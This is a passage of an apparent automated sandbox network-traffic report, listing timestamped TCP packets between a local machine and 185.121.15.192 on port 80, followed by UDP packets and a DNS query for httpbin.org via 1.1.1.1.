                                                  Dec 26, 2024 13:08:02.976429939 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976438999 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976449966 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976491928 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976556063 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976644039 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976654053 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976699114 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976733923 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976813078 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976821899 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976869106 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976878881 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.976964951 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977035046 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977130890 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977140903 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977178097 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977186918 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977264881 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977274895 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977318048 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977328062 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977395058 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977442980 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977535963 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977545023 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977574110 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977627993 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977682114 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977746964 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977785110 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977796078 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977924109 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.977936983 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:02.996155024 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:02.996253014 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.050769091 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.050858974 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094120979 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094162941 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094192982 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094222069 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094275951 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094304085 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.094331026 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.095148087 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.095231056 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.116112947 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116147041 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116177082 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116216898 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116255045 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116291046 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116393089 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116410971 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116420031 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116517067 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116585016 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116626024 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116713047 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116723061 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116832972 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116842031 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116871119 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116879940 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116961002 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.116970062 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117016077 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117091894 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117151022 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117158890 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117219925 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117229939 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117275953 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117285013 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117325068 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117353916 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117445946 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117463112 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117535114 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117584944 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117676973 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117686033 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117830038 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117840052 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117856026 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117865086 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117917061 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.117925882 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118021011 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118031025 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118081093 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118089914 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118179083 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118187904 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118220091 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118232012 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118280888 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118289948 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118395090 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.118465900 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.119261980 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.119385004 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.215169907 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215233088 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215292931 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215348959 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215379953 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215408087 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215459108 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215486050 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215533972 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215560913 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215686083 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215737104 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215787888 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215835094 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215939999 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.215966940 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216000080 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216051102 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216167927 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216196060 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216269970 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216321945 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216372013 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216430902 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216573954 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216629028 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216659069 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216725111 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216758013 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216860056 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216954947 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.216981888 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217031956 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217087030 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217119932 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217164993 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217231035 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217257977 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217308998 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217336893 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217411041 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217534065 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217562914 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217590094 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217638969 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217672110 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217720985 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217747927 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217794895 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217822075 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217870951 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.217919111 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.218014002 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.218041897 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.230421066 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.230521917 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.239017963 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239047050 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239128113 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239136934 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239238024 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239247084 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239331961 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239341021 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239384890 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239393950 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239526033 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239672899 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239682913 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239691973 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239757061 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239816904 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239847898 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239856958 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239967108 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.239975929 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240123034 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240133047 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240216017 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240226030 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240314960 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240324020 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240398884 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240408897 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240550041 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240577936 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240685940 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240696907 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240890980 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.240900993 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241004944 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241015911 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241082907 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241127014 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241178036 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241187096 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241288900 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241297960 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241336107 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241345882 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241420984 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241451979 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241532087 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241544008 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241624117 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241633892 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241738081 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241745949 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.241751909 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.242707014 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.242969990 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:03.350297928 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350378036 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350389957 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350450993 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350634098 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350646019 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350785971 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350856066 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350930929 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.350954056 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351066113 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351099968 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351141930 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351248980 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351299047 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351391077 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351399899 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351408958 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351464033 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351480007 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351629972 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351639986 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351649046 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351661921 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351699114 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351707935 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351762056 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351771116 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351805925 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351897001 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.351979971 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352034092 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352078915 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352149963 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352159977 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352185011 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352220058 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352277040 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352286100 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352374077 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352384090 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352441072 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352531910 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352541924 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352550983 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352667093 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352674961 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352790117 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352802038 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352870941 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352880001 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352948904 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352974892 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.352983952 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.362624884 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.362646103 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.362664938 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.362673998 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.362740993 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.362751007 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.362823963 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.362839937 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.362932920 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.362941980 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363023996 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363033056 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363075018 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363091946 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363178015 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363187075 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363234043 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363337994 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363348007 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363374949 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363462925 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363476038 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363514900 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363526106 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363645077 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363653898 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:03.363692045 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:05.768627882 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:05.768709898 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:05.768829107 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:05.769061089 CET4970180192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:05.888581991 CET8049701185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:05.985232115 CET4971280192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:06.105010986 CET8049712185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:06.105106115 CET4971280192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:06.105479956 CET4971280192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:06.224977016 CET8049712185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:07.638019085 CET8049712185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:07.638045073 CET8049712185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:07.638159037 CET4971280192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:07.638598919 CET4971280192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:07.758093119 CET8049712185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:07.830562115 CET4971880192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:07.950872898 CET8049718185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:07.951069117 CET4971880192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:07.956662893 CET4971880192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:08.076350927 CET8049718185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:09.587387085 CET8049718185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:09.587706089 CET8049718185.121.15.192192.168.2.7
                                                  Dec 26, 2024 13:08:09.587914944 CET4971880192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:09.587914944 CET4971880192.168.2.7185.121.15.192
                                                  Dec 26, 2024 13:08:09.707576990 CET8049718185.121.15.192192.168.2.7

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 26, 2024 13:07:57.260162115 CET5763953192.168.2.71.1.1.1
                                                  Dec 26, 2024 13:07:57.260222912 CET5763953192.168.2.71.1.1.1
                                                  Dec 26, 2024 13:07:57.398447990 CET53576391.1.1.1192.168.2.7
                                                  Dec 26, 2024 13:07:57.398777962 CET53576391.1.1.1192.168.2.7
                                                  Dec 26, 2024 13:08:01.236671925 CET6104453192.168.2.71.1.1.1
                                                  Dec 26, 2024 13:08:01.236746073 CET6104453192.168.2.71.1.1.1
                                                  Dec 26, 2024 13:08:01.379858971 CET53610441.1.1.1192.168.2.7
                                                  Dec 26, 2024 13:08:01.543785095 CET53610441.1.1.1192.168.2.7
                                                  Dec 26, 2024 13:08:05.846132994 CET6104653192.168.2.71.1.1.1
                                                  Dec 26, 2024 13:08:05.846191883 CET6104653192.168.2.71.1.1.1
                                                  Dec 26, 2024 13:08:05.984355927 CET53610461.1.1.1192.168.2.7
                                                  Dec 26, 2024 13:08:05.984380960 CET53610461.1.1.1192.168.2.7
                                                  Dec 26, 2024 13:08:07.692508936 CET6104853192.168.2.71.1.1.1
                                                  Dec 26, 2024 13:08:07.692616940 CET6104853192.168.2.71.1.1.1
                                                  Dec 26, 2024 13:08:07.829796076 CET53610481.1.1.1192.168.2.7
                                                  Dec 26, 2024 13:08:07.829854012 CET53610481.1.1.1192.168.2.7

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 26, 2024 13:07:57.260162115 CET192.168.2.71.1.1.10xaeb0Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
